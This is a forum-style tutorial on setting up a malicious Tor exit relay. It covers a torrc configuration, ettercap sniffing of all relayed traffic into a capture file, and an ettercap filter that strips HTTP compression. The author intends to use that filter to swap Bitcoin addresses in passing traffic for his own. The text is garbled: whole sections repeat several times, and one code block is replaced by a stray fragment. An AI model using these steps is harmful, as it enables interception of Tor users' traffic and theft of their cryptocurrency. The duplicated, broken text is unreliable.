So in light of recent events I thought I'd show you a quick way to setup a Tor MiTM Relay, this was done on Debian Buster (10.5)
Let's install Tor (You can get the latest packages by adding the Tor repo to your /apt/sources.list
Code
apt update
apt install tor
When those packages have finished installing Tor will automatically start running so let's stop that
Code
systemctl stop tor
Now remove the default Tor config
Code
rm /etc/tor/torrc
Now create a new torrc file and paste the following
Code
touch /etc/tor/torrc
Code
SOCKSPort 192.168.0.1:9100 # Bind to this address:port too, default is 9050
ExitPolicy accept *:80-444
ExitPolicy reject *:82-6500
ControlPort 9051
HashedControlPassword 16:BE7C48D44CF26570606B3676D65DC5357788CC1CF14006B06F5BC2399D - DO NOT USE THIS PASSWORD!
Nickname YOURRELAYNAME - CHANGE ME
ORPort 9001
SocksListenAddress 127.0.0.1
Remember to change the HASHED CONTROL PASSWORD with the following and the Nickname with whatever you want
Code
tor --hash-password YOURPASSWORD
Now we are ready to run Tor if you have kept your torrc file under /etc/tor/torrc this will be the default config now run the following (not as root!)
Code
tor -f /etc/tor/torrc
Wait until Tor finishes connecting and open a new root terminal now it's time to install ettercap (You could probably use another tool if you wanted)
Code
apt install ettercap
Now our relay is up and running so how do we start sniffing the traffic ? with one simple command
Code
ettercap -T -w dump.pcap -E -i wlp2s0
This is now a Tor relay which is sniffing all the traffic going through it, you could probably add a filter to modify traffic on the fly. (Currently trying to get this working with a regex, if anyone has any ideas about this then send me a PM I've already got the filter ready just needs a little tweaking) The filter for replacing text is below adding something like this (^[13][a-km-zA-HJ-NP-Z1-9]{25,34}$) to the script below would allow you to replace any Bitcoin address as yours (In theory)
Code
PASSWORD with the following and the Nickname with whatever you want
Code
tor --hash-password YOURPASSWORD
Now we are ready to run Tor if you have kept your torrc file under /etc/tor/torrc this will be the default config now run the following (not as root!)
Code
tor -f /etc/tor/torrc
Wait until Tor finishes connecting and open a new root terminal now it's time to install ettercap (You could probably use another tool if you wanted)
Code
apt install ettercap
Now our relay is up and running so how do we start sniffing the traffic ? with one simple command
Code
ettercap -T -w dump.pcap -E -i wlp2s0
This is now a Tor relay which is sniffing all the traffic going through it, you could probably add a filter to modify traffic on the fly. (Currently trying to get this working with a regex, if anyone has any ideas about this then send me a PM I've already got the filter ready just needs a little tweaking) The filter for replacing text is below adding something like this (^[13][a-km-zA-HJ-NP-Z1-9]{25,34}$) to the script below would allow you to replace any Bitcoin address as yours (In theory)
Code
##
# This filter will replace certain words In tcp packet
# requests befor forward the packet back to target host.
# based on code from ALoR, NaGA & Morpheus
##
##########################
## Zap Content Encoding ##
##########################
# change target request to server
if (ip.dst == '127.0.0.1' && ip.proto == TCP && tcp.dst == 80) {
if (search(DATA.data, "Accept-Encoding")) {
replace("Accept-Encoding", "Accept-Rubbish!");
msg("\n[test] host:127.0.0.1 [ ā¶ ] found ā");
msg("[test] |_ packet Accept-Encoding zapped
\n");
}
}
if (ip.dst == '127.0.0.1' && ip.proto == TCP && tcp.dst == 80) {
msg("[test] host:127.0.0.1 [ <- ] port:80 http ā");
if (search(DATA.data, "gzip")) {
replace("gzip", " "); # note: four spaces In the replacement string
}
}
Let's install Tor (You can get the latest packages by adding the Tor repo to your /apt/sources.list
Codeapt update
apt install tor
When those packages have finished installing Tor will automatically start running so let's stop that
Codesystemctl stop tor
Now remove the default Tor config
Coderm /etc/tor/torrc
Now create a new torrc file and paste the following
Codetouch /etc/tor/torrc
CodeSOCKSPort 192.168.0.1:9100 # Bind to this address:port too, default is 9050
ExitPolicy accept *:80-444
ExitPolicy reject *:82-6500
ControlPort 9051
HashedControlPassword 16:BE7C48D44CF26570606B3676D65DC5357788CC1CF14006B06F5BC2399D - DO NOT USE THIS PASSWORD!
Nickname YOURRELAYNAME - CHANGE ME
ORPort 9001
SocksListenAddress 127.0.0.1
Remember to change the HASHED CONTROL PASSWORD with the following and the Nickname with whatever you want
Codetor --hash-password YOURPASSWORD
Now we are ready to run Tor if you have kept your torrc file under /etc/tor/torrc this will be the default config now run the following (not as root!)
Codetor -f /etc/tor/torrc
Wait until Tor finishes connecting and open a new root terminal now it's time to install ettercap (You could probably use another tool if you wanted)
Codeapt install ettercap
Now our relay is up and running so how do we start sniffing the traffic ? with one simple command
Codeettercap -T -w dump.pcap -E -i wlp2s0
This is now a Tor relay which is sniffing all the traffic going through it, you could probably add a filter to modify traffic on the fly. (Currently trying to get this working with a regex, if anyone has any ideas about this then send me a PM I've already got the filter ready just needs a little tweaking) The filter for replacing text is below adding something like this (^[13][a-km-zA-HJ-NP-Z1-9]{25,34}$) to the script below would allow you to replace any Bitcoin address as yours (In theory)
CodePASSWORD with the following and the Nickname with whatever you want
Codetor --hash-password YOURPASSWORD
Now we are ready to run Tor if you have kept your torrc file under /etc/tor/torrc this will be the default config now run the following (not as root!)
Codetor -f /etc/tor/torrc
Wait until Tor finishes connecting and open a new root terminal now it's time to install ettercap (You could probably use another tool if you wanted)
Codeapt install ettercap
Now our relay is up and running so how do we start sniffing the traffic ? with one simple command
Codeettercap -T -w dump.pcap -E -i wlp2s0
This is now a Tor relay which is sniffing all the traffic going through it, you could probably add a filter to modify traffic on the fly. (Currently trying to get this working with a regex, if anyone has any ideas about this then send me a PM I've already got the filter ready just needs a little tweaking) The filter for replacing text is below adding something like this (^[13][a-km-zA-HJ-NP-Z1-9]{25,34}$) to the script below would allow you to replace any Bitcoin address as yours (In theory)
Code##
# This filter will replace certain words In tcp packet
# requests befor forward the packet back to target host.
# based on code from ALoR, NaGA & Morpheus
##
##########################
## Zap Content Encoding ##
##########################
# change target request to server
if (ip.dst == '127.0.0.1' && ip.proto == TCP && tcp.dst == 80) {
if (search(DATA.data, "Accept-Encoding")) {
replace("Accept-Encoding", "Accept-Rubbish!");
msg("\n[test] host:127.0.0.1 [ ā¶ ] found ā");
msg("[test] |_ packet Accept-Encoding zapped
\n");}
}
if (ip.dst == '127.0.0.1' && ip.proto == TCP && tcp.dst == 80) {
msg("[test] host:127.0.0.1 [ <- ] port:80 http ā");
if (search(DATA.data, "gzip")) {
replace("gzip", " "); # note: four spaces In the replacement string
}
}
